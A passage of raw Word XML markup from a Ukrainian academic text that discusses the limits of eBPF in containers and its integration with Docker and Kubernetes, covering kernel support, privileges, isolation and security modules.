      <w:r w:rsidR="005F0B54" w:rsidRPr="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>онтейнери працюють на спільному ядрі хоста, і для ефективного використання eBPF важливо, щоб ядро підтримувало всі необхідні функціональності. Однак не всі версії ядра мають підтримку для всіх можливостей eBPF, що може обмежити застосування цієї технології в контейнеризованих середовищах</w:t>
      </w:r>
      <w:r w:rsidR="007538B2" w:rsidRPr="007538B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [13]</w:t>
      </w:r>
      <w:r w:rsidR="005F0B54" w:rsidRPr="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F0B54" w:rsidRPr="005F0B54" w:rsidRDefault="008335DA" w:rsidP="008335DA">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І н</w:t>
      </w:r>
      <w:r w:rsidR="005F0B54" w:rsidRPr="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>арешті</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> пя’те</w:t>
      </w:r>
      <w:r w:rsidR="005F0B54" w:rsidRPr="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, існують</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F0B54" w:rsidRPr="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">проблеми з </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>налаштуванням та налагодженням</w:t>
      </w:r>
      <w:r w:rsidR="005F0B54" w:rsidRPr="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> eBPF-програм у контейнерах, оскільки доступ до контейнера для відлагодження або моніторингу часто обмежений. Крім того, інструменти для роботи з eBPF можуть не підтримувати контейнеризовані середовища без </w:t>
      </w:r>
      <w:r w:rsidR="005F0B54" w:rsidRPr="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>додаткових налаштувань, що ускладнює процес розробки, тестування та підтримки таких рішень</w:t>
      </w:r>
      <w:r w:rsidR="007538B2" w:rsidRPr="007538B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [13]</w:t>
      </w:r>
      <w:r w:rsidR="005F0B54" w:rsidRPr="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F0B54" w:rsidRDefault="005F0B54" w:rsidP="003269E9">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5F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Загалом, eBPF має великий потенціал для використання в контейнеризованих середовищах, однак існують кілька технічних обмежень, зокрема в питаннях безпеки, доступу до ресурсів та привілеїв. Врахування цих обмежень і використання відповідних механізмів для забезпечення належної роботи допоможе максимально ефективно інтегрувати eBPF у середовище контейнеризації, зберігаючи при цьому високий рівень безпеки та продуктивності</w:t>
      </w:r>
      <w:r w:rsidR="007538B2" w:rsidRPr="007538B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [13]</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000726E8" w:rsidRDefault="000726E8" w:rsidP="003269E9">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0726E8" w:rsidRPr="000726E8" w:rsidRDefault="000726E8" w:rsidP="000726E8">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000726E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2. Сумісність та інтеграція </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000726E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000726E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> з </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000726E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000726E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000726E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000726E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> та іншими платформами</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000726E8" w:rsidRDefault="000726E8" w:rsidP="003269E9">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AA5B2B" w:rsidRPr="00AA5B2B" w:rsidRDefault="007538B2" w:rsidP="00AA5B2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7538B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Завдяки своїй гнучкості, eBPF має великий потенціал для використання в контейнеризованих середовищах, таких як Docker та Kubernetes, а також в інших платформах для автоматизації управління контейнерами та оркестрації. Проте інтеграція eBPF в ці се</w:t>
      </w:r>
      <w:r w:rsidR="0015581F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>редовища має певні виклики, пов’</w:t>
      </w:r>
      <w:r w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>язані з їх специфікою, ізоляцією контейнерів, привілеями та іншими технічними аспектами</w:t>
      </w:r>
      <w:r w:rsidRPr="007538B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [14]</w:t>
      </w:r>
      <w:r w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B" w:rsidRDefault="00AA5B2B" w:rsidP="00AA5B2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AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker є однією з найпопулярніших платформ для контейнеризації, яка надає можливість запускати та ізолювати </w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ПЗ</w:t>
      </w:r>
      <w:r w:rsidR="003560E6" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>в контейнерах. Хоча Docker працює на спільному ядрі хоста, ізоляція контейнерів може створювати складнощі для інтеграції eBPF. Контейнери в Docker мають обмежений доступ до ядерних функцій хоста, що може обмежити можливості eBPF-програм для моніторингу або змінення поведінки системних викликів та мережевого трафіку</w:t>
      </w:r>
      <w:r w:rsidR="007538B2" w:rsidRPr="007538B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [15]</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B" w:rsidRDefault="007538B2" w:rsidP="00AA5B2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7538B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Для того щоб eBPF працював ефективно в Docker, необхідно враховувати кілька факторів</w:t>
      </w:r>
      <w:r w:rsidRPr="007538B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [15]</w:t>
      </w:r>
      <w:r w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B" w:rsidRDefault="0015581F" w:rsidP="00AA5B2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Привілеї.</w:t>
      </w:r>
      <w:r w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker контейнери за замовчуванням мають обмежені привілеї, тому для виконання деяких eBPF-програм можуть знадобитися </w:t>
      </w:r>
      <w:r w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>спеціальні налаштування. Наприклад, для доступу до мережевих функцій або для виконання системних викликів на рівні ядра, контейнерам може знадобитися root-доступ або підвищені привілеї.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B" w:rsidRDefault="0015581F" w:rsidP="00AA5B2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Ізоляція контейнерів.</w:t>
      </w:r>
      <w:r w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker надає рівень ізоляції між контейнерами, що ускладнює моніторинг взаємодії між ними на низькому рівні. Для моніторингу трафіку між контейнерами, що знаходяться в окремих мережах, необхідно використовувати додаткові налаштування, такі як CNI плагіни або інші рішення для контейнерної мережевої інтеграції.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B" w:rsidRDefault="0015581F" w:rsidP="00AA5B2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Механізми безпеки.</w:t>
      </w:r>
      <w:r w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Для забезпечення безпеки роботи eBPF в Docker, можуть знадобитися механізми, які дозволяють обмежити доступ до ядра хоста, зберігаючи при цьому функціональність eBPF. Це включає використання інструментів безпеки, таких як Seccomp, SELinux або AppArmor, щоб знизити ризики від потенційно шкідливих eBPF-програм.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B2B" w:rsidRPr="007538B2" w:rsidRDefault="007538B2" w:rsidP="00AA5B2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7538B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="0015581F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Розглядаючи і</w:t>
      </w:r>
      <w:r w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>нтеграці</w:t>
      </w:r>
      <w:r w:rsidR="0015581F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ю</w:t>
      </w:r>
      <w:r w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0015581F" w:rsidRPr="0015581F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">eBPF </w:t>
      </w:r>
      <w:r w:rsidR="0015581F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">з Kubernetes необхідно зазначити, що дана платформа </w:t>
      </w:r>
      <w:r w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>є системою оркестрації контейнерів, яка автоматизує розгортання, масштабування та управління контейнеризованими додатками. Інтеграція eBPF з Kubernetes надає можливість реалізувати потужні функції моніторингу, безпеки та управління мережею на рівні контейнерів у кластері. Однак, як і в Docker, інтеграція з Kubernetes має</w:t>
      </w:r>
      <w:r w:rsidR="0015581F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> кілька </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>особливостей і викликів, а саме</w:t>
      </w:r>
      <w:r w:rsidRPr="007538B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [16]:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0015581F" w:rsidRDefault="0015581F" w:rsidP="00AA5B2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15581F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">По-перше, розглядаючи мережеву ізоляцію, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">слід зауважити що </w:t>
      </w:r>
      <w:r w:rsidRPr="0015581F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
